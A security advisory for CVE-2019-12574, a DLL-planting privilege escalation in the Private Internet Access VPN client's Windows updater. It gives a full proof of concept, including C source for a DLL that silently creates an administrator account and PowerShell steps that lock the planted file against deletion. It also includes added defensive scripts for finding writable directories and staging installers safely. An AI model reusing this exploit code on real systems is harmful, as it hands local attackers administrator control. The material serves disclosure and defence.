ASA-2019-00380 – London Trust Media Private Internet Access: DLL injection vulnerability during the update process


Allele Security Alert

ASA-2019-00380

Identifier(s)

ASA-2019-00380, CVE-2019-12574

Title

DLL injection vulnerability during the update process

Vendor(s)

London Trust Media

Product(s)

Private Internet Access (PIA) VPN Client

Affected version(s)

Private Internet Access (PIA) VPN Client for Windows version v1.0

Fixed version(s)

Private Internet Access (PIA) VPN Client for Windows version v1.0.1

Proof of concept

Yes

Description

A vulnerability in the London Trust Media Private Internet Access (PIA) VPN Client v1.0 for Windows could allow an authenticated, local attacker to run arbitrary code with elevated privileges.

The PIA desktop client is vulnerable to DLL injection during the update process. The updater loads several DLLs from a directory to which authenticated users have write access. A low-privileged user can exploit this to execute arbitrary code in the context of the administrator who installs the update.

Technical details

When an update is available, a low-privileged user is notified in the client and offered the option to download it. When clicked, the PIA client sends a command to the PIA service to download the update. The update is staged in “C:\ProgramData\Private Internet Access\update\”. This directory and all files within it are removed by the service before the update file is stored. Because “C:\ProgramData\Private Internet Access” grants BUILTIN\Users the right to create files and subfolders (see the permissions below), a low-privileged user can create the update directory in advance and, as its CREATOR OWNER, receives Full control over it.

A low-privileged user can therefore place a file in the update directory and hold it open with a share mode that excludes delete access, which prevents the PIA service from deleting it during the download. This can be leveraged to stage a malicious DLL that the update process will load. The next time an administrator opens the PIA client, a new option to install the latest version is available. When clicked, the updater runs the installer from the update directory and silently executes the planted code as that administrator. This PoC demonstrates the effect by adding a new administrator named “woot” during the update process.

The following DLLs are loaded by pia-windows-x64-1.0-02176.exe from the update directory. They resolve there because Windows searches the directory the executable was started from before the system directories, so a file with a matching name planted next to the installer is the one that gets loaded:

C:\ProgramData\Private Internet Access\update\spinf.dll
C:\ProgramData\Private Internet Access\update\USERENV.dll
C:\ProgramData\Private Internet Access\update\newdev.dll
C:\ProgramData\Private Internet Access\update\DEVRTL.dll
C:\ProgramData\Private Internet Access\update\DEVOBJ.dll
C:\ProgramData\Private Internet Access\update\drvstore.dll
C:\ProgramData\Private Internet Access\update\PROPSYS.dll
C:\ProgramData\Private Internet Access\update\LINKINFO.dll
C:\ProgramData\Private Internet Access\update\ntshrui.dll
C:\ProgramData\Private Internet Access\update\SspiCli.dll
C:\ProgramData\Private Internet Access\update\srvcli.dll
C:\ProgramData\Private Internet Access\update\cscapi.dll
C:\ProgramData\Private Internet Access\update\CLDAPI.dll
C:\ProgramData\Private Internet Access\update\FLTLIB.DLL
C:\ProgramData\Private Internet Access\update\apphelp.dll
C:\ProgramData\Private Internet Access\update\netutils.dll

Permissions of “c:\ProgramData\Private Internet Access” showing that BUILTIN\Users has write access. The (CI)-only entry applies to this folder and to subfolders created beneath it, and the CREATOR OWNER entry gives whoever creates a subfolder Full control of it.

c:\ProgramData\Private Internet Access NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
BUILTIN\Administrators:(OI)(CI)(ID)F
CREATOR OWNER:(OI)(CI)(IO)(ID)F
BUILTIN\Users:(OI)(CI)(ID)R
BUILTIN\Users:(CI)(ID)(special access:)
FILE_WRITE_DATA
FILE_APPEND_DATA
FILE_WRITE_EA
FILE_WRITE_ATTRIBUTES

Permissions of “c:\ProgramData\Private Internet Access\update” after the test1 user created it (see step 2), showing that test1 has Full control through the inherited CREATOR OWNER entry.

c:\ProgramData\Private Internet Access\update NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
BUILTIN\Administrators:(OI)(CI)(ID)F
CHAOS\test1:(ID)F
CREATOR OWNER:(OI)(CI)(IO)(ID)F
BUILTIN\Users:(OI)(CI)(ID)R
BUILTIN\Users:(CI)(ID)(special access:)
FILE_WRITE_DATA
FILE_APPEND_DATA
FILE_WRITE_EA
FILE_WRITE_ATTRIBUTES
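
The precondition shown by the two listings above (a low-privileged principal able to create content in a directory that a privileged process later executes from) can be found systematically. The following PowerShell script is an added example written for this alert; it is not part of the original advisory or of the PIA code base. It walks a directory tree and reports every Allow ACE that gives BUILTIN\Users, Authenticated Users, Everyone or INTERACTIVE the FILE_WRITE_DATA (CreateFiles) or FILE_APPEND_DATA (CreateDirectories) bits seen in the cacls output, either directly or through Write, Modify, FullControl or a generic right. The default $Root value is only an illustration; point it at any product directory under C:\ProgramData.

```powershell
# Added example (not the advisory's or PIA's code): find directories under $Root where a
# low-privileged principal can create or write files. The default $Root is an illustration.
param(
    [string]$Root = 'C:\ProgramData\Private Internet Access'
)

$FSR = [System.Security.AccessControl.FileSystemRights]

# SIDs that every authenticated or interactive user is a member of.
$LowPrivSids = @(
    'S-1-5-32-545',   # BUILTIN\Users
    'S-1-5-11',       # Authenticated Users
    'S-1-1-0',        # Everyone
    'S-1-5-4'         # INTERACTIVE
)

# Rights that let a caller place content in a directory. CreateFiles is FILE_WRITE_DATA and
# CreateDirectories is FILE_APPEND_DATA (the two bits in the cacls output above); Write,
# Modify and FullControl contain them. Generic rights show up as raw bits and are checked separately.
$WriteBits = [int]($FSR::CreateFiles -bor $FSR::CreateDirectories -bor $FSR::Write -bor $FSR::Modify -bor $FSR::FullControl)
$GenericWriteBits = 0x40000000 -bor 0x10000000   # GENERIC_WRITE | GENERIC_ALL

function Test-LowPrivWritable {
    param([Parameter(Mandatory)][string]$Path)
    $acl = Get-Acl -LiteralPath $Path
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne [System.Security.AccessControl.AccessControlType]::Allow) { continue }
        try {
            $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value
        } catch {
            continue   # orphaned or unresolvable SID; not one of ours
        }
        if ($LowPrivSids -notcontains $sid) { continue }
        $rights = [int]$ace.FileSystemRights
        if ((($rights -band $WriteBits) -eq 0) -and (($rights -band $GenericWriteBits) -eq 0)) { continue }
        [pscustomobject]@{
            Path        = $Path
            Identity    = $ace.IdentityReference.Value
            Rights      = $ace.FileSystemRights
            # ContainerInherit without ObjectInherit is the (CI) case from the advisory: new
            # subfolders inherit the write ACE, so a user-created subfolder is user-writable too.
            Inheritance = $ace.InheritanceFlags
            Inherited   = $ace.IsInherited
        }
    }
}

# Check the root and every subdirectory; directories we cannot read are skipped.
$dirs = @(Get-Item -LiteralPath $Root) + @(Get-ChildItem -LiteralPath $Root -Directory -Recurse -ErrorAction SilentlyContinue)
$dirs | ForEach-Object { Test-LowPrivWritable -Path $_.FullName } | Format-Table -AutoSize
```

Run it as an ordinary user (`.\Find-LowPrivWritable.ps1 -Root 'C:\ProgramData'`); a result for a directory that a service or elevated installer later loads binaries from is worth a closer look, and `icacls <path>` gives the same ACE in its compact notation for cross-checking.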

1) Open a cmd shell and change to the “C:\ProgramData\Private Internet Access” folder.

cd "c:\ProgramData\Private Internet Access"

2) Create the update folder and change to it.

mkdir update
cd update

3) Create a malicious library that adds a local administrator account named woot when loaded. The payload runs from DllMain on DLL_PROCESS_ATTACH, so it fires as soon as the installer loads the DLL, with the installer's elevated token.

/* Cross compile with
   x86_64-w64-mingw32-g++ woot.c -o woot.dll -shared
   The DLL exports nothing; the payload lives entirely in DllMain. */

#include <windows.h>
#include <stdlib.h>   /* system() */

BOOL WINAPI DllMain(
    HINSTANCE hinstDLL,
    DWORD fdwReason,
    LPVOID lpReserved )
{
    switch( fdwReason )
    {
        case DLL_PROCESS_ATTACH:
            /* Runs once in the loading process, with that process's token
               (the elevated installer here). Calling system() under the
               loader lock is unsupported in general but suffices for this PoC.
               Replace the placeholder password before building. */
            system("cmd /c net user woot insertpasswordhere /add");
            system("cmd /c net localgroup administrators woot /add");
            break;

        case DLL_THREAD_ATTACH:
            // Do thread-specific initialization.
            break;

        case DLL_THREAD_DETACH:
            // Do thread-specific cleanup.
            break;

        case DLL_PROCESS_DETACH:
            // Perform any necessary cleanup.
            break;
    }
    return TRUE; // Successful DLL_PROCESS_ATTACH.
}

4) Copy the malicious DLL into the update folder under the name of one of the libraries listed above. This PoC uses spinf.dll as the target.

copy woot.dll spinf.dll

5) Execute PowerShell and hold spinf.dll open with a share mode that allows other readers but denies delete, so the PIA service cannot remove it while it clears the directory. The author appreciates @poshkatz for teaching him how to easily lock files with PowerShell.

# Use the full path: .NET resolves relative paths against the process working directory,
# which need not match the PowerShell prompt's current location.
$f = [System.IO.File]::Open("c:\ProgramData\Private Internet Access\update\spinf.dll",
    [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileShare]::Read)

Keep this PowerShell session open; the handle is released, and the file becomes deletable again, as soon as $f is disposed or the session ends.

6) Verify the lock by typing $f. The output should look like this.

CanRead : True
CanWrite : False
CanSeek : True
IsAsync : False
Length : 287283
Name : c:\ProgramData\Private Internet Access\update\spinf.dll
Position : 0
Handle : 880
SafeFileHandle : Microsoft.Win32.SafeHandles.SafeFileHandle
CanTimeout : False
ReadTimeout :
WriteTimeout :

7) Open the PIA client. An update will be available. Click Download v1.0.0.

8) Now that the update is staged, exit all windows and log out. Closing the PowerShell session releases the handle on spinf.dll, but the file only needed protecting while the service was clearing the directory; the download has already completed, so the planted DLL stays in place next to the installer.

9) Login as an Administrator.

10) Open the PIA client and click the update icon in the upper right and then click the “Install v1.0.0” option. The update will install normally.

11) At this point the “woot” administrator account will exist. Open a cmd shell and verify.

net user woot
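
The procedure above works because the privileged updater runs an installer from a directory it does not control and trusts whatever is already there. The following PowerShell script is an added example of how a privileged update service can stage and launch an installer safely; it is not the PIA updater's code and is not how the vendor fixed the issue. $StageRoot and $ExpectedThumbprint are illustrative assumptions, and the download step is left out, with the already-downloaded installer passed in as $InstallerPath. Note that an Authenticode check on its own would not have prevented this bug, since the installer being run is genuine; the directory must also be non-writable by users and empty apart from the verified file.

```powershell
# Added example (not PIA's code): stage and run a downloaded installer so that a DLL planted
# by a low-privileged user is never loaded. $StageRoot and $ExpectedThumbprint are assumptions.
param(
    [Parameter(Mandatory)][string]$InstallerPath,
    [Parameter(Mandatory)][string]$ExpectedThumbprint,   # SHA-1 thumbprint of the vendor's code-signing certificate
    [string]$StageRoot = 'C:\Program Files\Private Internet Access\update'
)
$ErrorActionPreference = 'Stop'   # any failure below aborts the update instead of continuing on a dirty directory

function New-LockedDownStageDir {
    param([Parameter(Mandatory)][string]$Path)
    # A user may have pre-created this directory and may hold a file in it open. If it cannot be
    # removed completely, Remove-Item throws and we stop: never run an installer from a directory we do not own.
    if (Test-Path -LiteralPath $Path) {
        Remove-Item -LiteralPath $Path -Recurse -Force
    }
    $dir = New-Item -ItemType Directory -Path $Path
    $acl = Get-Acl -LiteralPath $dir.FullName
    # Cut inheritance so a parent ACE such as ProgramData's BUILTIN\Users:(CI) write entry does
    # not flow in, then grant only SYSTEM and Administrators.
    $acl.SetAccessRuleProtection($true, $false)
    $full  = [System.Security.AccessControl.FileSystemRights]::FullControl
    $inh   = [System.Security.AccessControl.InheritanceFlags]'ContainerInherit, ObjectInherit'
    $prop  = [System.Security.AccessControl.PropagationFlags]::None
    $allow = [System.Security.AccessControl.AccessControlType]::Allow
    foreach ($sid in 'S-1-5-18', 'S-1-5-32-544') {   # NT AUTHORITY\SYSTEM, BUILTIN\Administrators
        $id   = New-Object System.Security.Principal.SecurityIdentifier($sid)
        $rule = New-Object System.Security.AccessControl.FileSystemAccessRule($id, $full, $inh, $prop, $allow)
        $acl.AddAccessRule($rule)
    }
    Set-Acl -LiteralPath $dir.FullName -AclObject $acl
    return $dir.FullName
}

function Test-TrustedInstaller {
    param([Parameter(Mandatory)][string]$Path, [Parameter(Mandatory)][string]$Thumbprint)
    $sig = Get-AuthenticodeSignature -LiteralPath $Path
    # A valid chain alone is not enough: pin the signer, otherwise any validly signed binary passes.
    return ($sig.Status -eq 'Valid' -and $sig.SignerCertificate.Thumbprint -eq $Thumbprint)
}

$stage = New-LockedDownStageDir -Path $StageRoot
$dest  = Join-Path $stage (Split-Path -Leaf $InstallerPath)
Copy-Item -LiteralPath $InstallerPath -Destination $dest

# Verify the copy inside the locked-down directory, not the source, so the file checked is the file run.
if (-not (Test-TrustedInstaller -Path $dest -Thumbprint $ExpectedThumbprint)) {
    throw "Installer signature check failed for $dest"
}

# The signature covers only the installer; the DLLs it resolves from its own directory are not
# covered, so make sure nothing else is present before launching.
$foreign = @(Get-ChildItem -LiteralPath $stage -Force | Where-Object { $_.FullName -ne $dest })
if ($foreign.Count -gt 0) {
    throw "Unexpected entries in staging directory: $($foreign.Name -join ', ')"
}

# Launch by fully qualified path; the application directory is searched first for DLLs, and by
# now it contains only the verified installer.
Start-Process -FilePath $dest -Wait
```

The three checks are deliberately ordered: the directory is made private before anything is copied into it, the signature is verified on the copy that will actually execute, and the directory is confirmed to contain nothing else immediately before launch. Run under the service account, a locked file left behind by a user turns into a failed Remove-Item and an aborted update rather than a silently hijacked one.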

Credits

Rich Mirch

Reference(s)

PIA Windows Privilege Escalation: DLL Injection
https://github.com/mirchr/security-research/blob/master/vulnerabilities/PIA/CVE-2019-12574.txt

CVE-2019-12574
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12574

CVE-2019-12574
https://nvd.nist.gov/vuln/detail/CVE-2019-12574

If there is any error in this alert or you wish a comprehensive analysis, let us know.

Last modified: June 25, 2019

We are not responsible for any data loss, device corruption or any other type of issue due to the use of any information mentioned in our security alerts.